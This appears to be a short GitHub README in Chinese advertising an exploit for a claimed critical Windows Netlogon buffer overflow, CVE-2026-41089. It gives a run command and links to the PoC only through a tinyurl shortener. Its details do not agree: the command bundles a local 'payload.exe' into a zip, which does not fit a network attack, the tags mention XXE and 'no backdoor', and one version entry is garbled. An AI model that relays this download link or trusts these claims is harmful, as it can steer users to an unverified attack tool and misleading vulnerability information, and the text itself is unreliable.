jenniferreire26/CVE-2026-41089

# CVE-2026-41089 - 安全缓冲区溢出 ## 快速使用 ``` python3 exploit.py -t "C:\\Path\\To\\Target" -o demo.zip --data-file payload.exe ``` ## 漏洞利用说明 - **严重程度：** 严重 - **CVSS：** 9.8 - **影响：** 机密性、完整性、可用性 - **发布日期：** 2026-05-12 ## 技术概述 Windows Netlogon 中存在的基于栈的缓冲区溢出漏洞，允许未经授权的攻击者通过网络执行代码。 ## 受影响版本 **Microsoft Windows Server 2012:** - - - r2 **Microsoft Windows Server 2016:** - 10.0.14393.9140 之前 **Microsoft Windows Server 2019:** - 10.0.17763.8755 之前 **Microsoft Windows Server 2022:** - 10.0.20348.5074 之前 **Microsoft Windows Server 2022 23H2:** - 10.0.25398.2330 之前 **Microsoft Windows Server 2025:** - 10.0.26100.32772 之前 ## 参考资料 - NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-41089 ## 漏洞利用 [下载 PoC](https://tinyurl.com/2ysfff63)

标签：Python, XXE攻击, 威胁模拟, 无后门, 缓冲区溢出, 逆向工具